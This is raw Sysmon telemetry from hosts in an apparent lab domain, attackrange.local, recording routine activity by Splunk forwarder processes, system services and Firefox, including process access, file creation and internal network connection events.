21:45:11.242{39BD8DE3-0F63-60CA-0500-00000000D101}408524C:\Windows\system32\csrss.exe{39BD8DE3-70E7-60CA-180D-00000000D101}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000150379Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:11.242{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-70E7-60CA-180D-00000000D101}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000150378Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:11.243{39BD8DE3-70E7-60CA-180D-00000000D101}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000150389Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:12.789{39BD8DE3-0F65-60CA-1200-00000000D101}960NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=194C8CF65AC08ED5AD3465F113EC57A6,SHA256=2E8BBEC5FB52A2AE9C895CF300662680C4BAE102BDC4C3B498AA51841B5B44DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150388Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:12.589{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA42DB5125BC5775019E56581E6F523F,SHA256=6D872FACA296BE1BD9A60B9B33960F8EC4EF66F68DBBCAE6710CBDB4308DAC5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150387Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:12.242{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA1951526A9B390673BB1261E8239857,SHA256=3CC057A424CA320B6C168FCACD2C381455C622E9A55164D735D320BB990E97B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104779Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:13.038{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9543AB8D0495CFBF9A30B9B82B1F07B3,SHA256=1662A4F9FFD149319A898AC1AE4646123405BB1525124B4B2E5C86B006FC4361,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104778Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:13.038{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-70E9-60CA-2813-00000000CF01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104777Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:13.036{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104776Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:13.036{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104775Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:13.036{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104774Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:13.036{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104773Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:13.033{54715871-FD16-60C9-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{54715871-70E9-60CA-2813-00000000CF01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104772Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:13.033{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-70E9-60CA-2813-00000000CF01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104771Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:13.032{54715871-70E9-60CA-2813-00000000CF01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000150390Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:13.610{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEBA55C0832819C61EDF4C68588574CE,SHA256=CDA1F6B1ED4312E1331B11D46E2E50B6DBDB28321118D8410BC3D5C33A4CE139,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104781Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:14.400{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BB74D76DDBAA013814CAA023FC8EB677,SHA256=FE2708F426BF51A2EFCC9BEEF2CCFACF2193D38BFE900CB1B193626D1B5218F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104780Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:14.397{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26665E74EB5134BEC9575A4BDC301259,SHA256=053D9E3EAFDF41615842FF3A91B440653B77BDECE556D5DAD1ADAC2AC8EACFF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150392Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:14.656{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E351DD27D2407379225DA3F17F07BCDC,SHA256=E81BBA2E515A633CE4143DB5251AC5F3CAFB076A695770507AA71DE88FB9E857,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150391Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:12.024{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58383-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104782Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:15.762{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=202A22084A3DDA9EACCBF3292E3D7AA9,SHA256=E9217956CE8B9B5B27018A5EB04ACFB9EF63978CA4976D3403DE2B23276B2B26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150393Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:15.686{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BBB2C1F9F6362191496BBCF3AF526C0,SHA256=A2BE1D144597FA515B424234FAFFC602A5C9D187D511115679F07FA7AE73BA9F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104783Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:13.905{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55404-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000150394Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:16.704{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0236A177ACEBF351E759F73CC1115085,SHA256=4B71C0F02C8880281A50E150D6A5C45684B79C03C25033B8F432D44AF81D4D4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104784Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:17.125{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD90BFC9E2FD4EBB994208C694071D70,SHA256=7D7032D10A5AC8A26F1C2012E4F27D3F32100CA1315370B6073304A8F56AD4A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150397Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:17.754{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150396Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:17.754{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=137BB183FD5B9D26F98B570F7F103892,SHA256=6FFEEA5B54AB72AB5DEC049BD1EB0701681FA1D4143F439605610167EDD5D815,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150395Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:17.738{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7DEC15018E59EDB78E80BFED7D76E39,SHA256=558AB2095100F05693CE93ADB42DD2722964C3358746FA46392412507B14AA95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104785Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:18.490{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16CC410CA71E28F3231B65C7076711E0,SHA256=4302877C345BC37A87664C8C4E1E9B992B99F8E2D9F9B5495E040F3122983AF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150398Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:18.752{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89805ABE7380421300C54284917CC48F,SHA256=DE0CC23DFFFA74B378CBAAF399E52392B144767C3BE54827044EEF09ABE4C9C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104786Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:19.854{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D3588835162C1E571E892427F8DEE39,SHA256=3B146DE61C59870B658E233F3069694F048E343A1919E5B8B0D9BDD10F50BE57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150402Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:19.767{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCD37B68162E71998234F211AF3CC22B,SHA256=E9BAB132D4835F55C21579CD37C4C75CDDFFAF2D89838CB5C493182259F67807,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150401Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:17.873{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58384-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000150400Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:19.068{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FDD66532DBE489E25CE984024A58E240,SHA256=D2E2055B2DCCD467F14783DD099CD9905090E2A5E0F95776EA2264BF0D80F914,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150399Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:19.068{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F7D08C633B84D9033AD77562F0CB073,SHA256=93C87CFC64CA76DD5C6FF8F38075309DCB97CB7EC688B88EBD1FB90418990F29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150426Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.783{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CEABE2028DBB42EDC78CE8CE5E0D86F,SHA256=680D06AC122CBC554AEF14471EEFDEB550867BAB97432EA78109828A8831D8C2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150425Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150424Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150423Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150422Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150421Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 